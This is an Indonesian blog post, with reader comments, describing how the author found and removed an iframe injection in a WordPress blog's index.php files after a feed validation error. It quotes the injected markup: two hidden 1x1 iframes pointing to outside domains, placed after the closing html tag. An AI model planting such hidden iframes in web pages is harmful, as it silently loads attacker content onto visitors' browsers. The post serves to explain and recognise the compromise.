Iframe (injection) masalah pertama Optimasi Feed Blog

iframe-injection-warning

Definisi iframe atau frame inline menurut W3C (World Wide Web Consortium), apabila diterjemahkan secara singkat kurang lebih mungkin adalah sebuah pengembangan model tag html <frame>, untuk menampilkan sebuah frame di dalam sebuah page/halaman html. Bingung yach :D,.. yang nulis aja juga bingung menjabarkannya.

Tapi cara paling mudah untuk mengidentifikasi sebuah halaman html yang di dalamnya terdapat sebuah tag <frame> dan keluarganya adalah apabila di dalam sebuah halaman html terdapat tombol scroll serupa dengan scroll yang ditepi kanan browser yang kita pergunakan, atau apabila terdapat suatu bagian yang bisa kita gulung, tapi bagian yang lain tidak berubah posisinya. Oops,.. betul,.. kalau kita sedang menulis sebuah entry / posting dalam WordPress sudah pasti kita langsung kenal dengan bentuk tag <frame>.

Silahkan melanjutkan sendiri penjelasannya, karena tag-tag html seperti <frameset></frameset>, <frame></frame>, <iframe></iframe> adalah menu pertama belajar terjun ke dalam dunia maya (baca : web).

Yang hendak saya tulis disini adalah frame definisi atau <iframe></iframe> yang disisipkan setelah tag penutup sebuah halaman html.

normalnya sebuah tag iframe dalam page html terstruktur seperti berikut :

<html>
<head><title></title>
</head>
<body>
...
<iframe>...</iframe>
...
</body>
</html>

iframe diletakkan sebelum tag </body> dan atau sebelum tag </html>

Apa jadinya jika tag iframe terletak dibawah tag penutup halaman html, seperti ini:

<html>
<head>
<title></title>
</head>
<body>
....
</body>
</html>
<iframe src=\"http://warpiln.com/?click=176C8E2\"
width=1 height=1 style=\"visibility:hidden;position:absolute\">
</iframe>
<iframe src=\"http://rebbeta.net/?click=A5EC70\"
width=1 height=1 style=\"visibility:hidden;position:absolute\">
</iframe>

para master programming menyebutnya sebagai iframe injection, jika menemukan hal seperti tersebut diatas pada sebuah halaman html, maka sebaiknya singsingkan lengan baju,.. ambil langkah seribu,.. segera diobati sebelum berapa lapis ?!? Ratusan,.. dan segera memperbaiki keamanan file-file instalasi. Rumornya,.. bukan rumornya lagi ding,.. Jangankan cita-cita pagerank naik, traffic tumbuh, dst, dst. Tetapi justru website diblok karena dianggap sebagai biang penyebar spam.

Sebagai seorang pemula,.. yang sedang belajar terjun ke dunia maya, mencoba membuat blog, belajar menulis dan kemudian mencoba mencicipi rasanya mengalihkan halaman feed ke FeedBurner. Pada saat minta persetujuan untuk pengalihan yang saya maksudkan diatas, saya tidak segera mendapatkannya tetapi justru dihadapkan pada pesan Error dan disarankan untuk untuk melakukan validasi feed. Setelah membaca berulang-ulang setiap error message yang ditampilkan, ternyata yang menjadi penyebabnya adalah iframe injection tadi, tag <iframe></iframe> yang tidak normal seperti contoh diatas.

Beruntung kejadian ini segera diketahui sejak awal, sehingga tidak berakibat fatal (dianggap sebagai penyebar spam tadi). Setelah mengedit-hapus baris (line) “echo <iframe bla.. bla.. bla.. ” tersebut pada file-file index.php, syukurlah tag <iframe> tidak normal tersebut tidak berkunjung lagi.

Bagaimana kalau sudah terlanjur terjangkiti iframe injection berlapis-lapis pada semua file index.php ?

Jujur, saya juga sedang mencari solusinya. Mudah-mudahan setelah menemukan jawabannya bisa segera saya tuliskan lagi (maksimal untuk kepentingan diri sendiri dulu saja).

Iframe (injection) masalah pertama Optimasi Feed Blog

Published on : Jul 31, 2009. Last modified at : Dec 03, 2009.


Click to share on twitter , digg it, or save this article to del.icio.us.

article Navigation

Related to “Iframe (injection) masalah pertama Optimasi Feed Blog”.

3 Opinion for “Iframe (injection) masalah pertama Optimasi Feed Blog”.

Boss, kalo masukin iframe ke dalam postdi wordpress gimana ya??
saya sudah coba sesuai dengan contoh diatas, tapi saat di publish, iframe tersebut jadi hilang, tolong pencerahannya.
Thanks…

Tulisan diatas hanya menjelaskan tata letak yang benar dan yang salah untuk sebuah tag <Frameset> (beserta familynya) pada sebuah dokumen HTML. :)
Saya minta maaf untuk kekurangan tersebut, sehingga timbul asumsi yang keliru.

Dalam perkembangannya, W3C telah merilis beberapa format dokumen dari HTML sampai XHTML beserta tool validation untuk masing-masing tipe dokumen.
Termasuk didalamnya format dokumen Frameset.

Sejauh yang saya pahami, elemen frameset dan familynya lebih dikembangkan sebagai sebuah format pembangun sebuah halaman HTML.
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transational…..”>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Strict…..”>
dan lain-lain.
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML Frameset…..”>

Mengenai Syntak tag <iframe> sendiri, bisa di contohkan sebagai berikut :

<iframe src=”url” atribut1 atribut2 atribut.. ></iframe>

<iframe> tag bisa diikuti beberapa atribut standar seperti class, id, style atau title.
Selain pada format dokumen DTD Strict, <iframe> juga bisa dikuti atribut-atribut seperti name, align, width, height, dan tentunya atribut src (atribut yang tidak bisa dipisahkan sesuai fungsi frameset).

Alasan paling masuk akal, kenapa iframe anda tidak muncul adalah format dokumen anda. Karena sesuai peruntukan diatas, tag iframe sudah tidak support pada dokumen HTML 4.1 Strict DTD dan XHTML 1.0 Strict DTD.
Double check format dokumen anda gunakan dalam theme yang dipakai (first line at header.php file), untuk meyakinkan bahwa halaman anda masih support atau tidak untuk tag <iframe>.

Mudah-mudahan bisa membantu. :)

Kalau boleh tau, siapa orang iseng yang menginjeksi frame tsb pak dhe?

Leave an Opinion

Important : LOW isn't intended to on topic opinions, just be polite. You may use strict markup only. Opinions failing these requirement will be edited. Spam opinion won't get published.
Please, enter your real name and your valid email address (in required field). Don't worry, i'll kept your email private.










Random Learning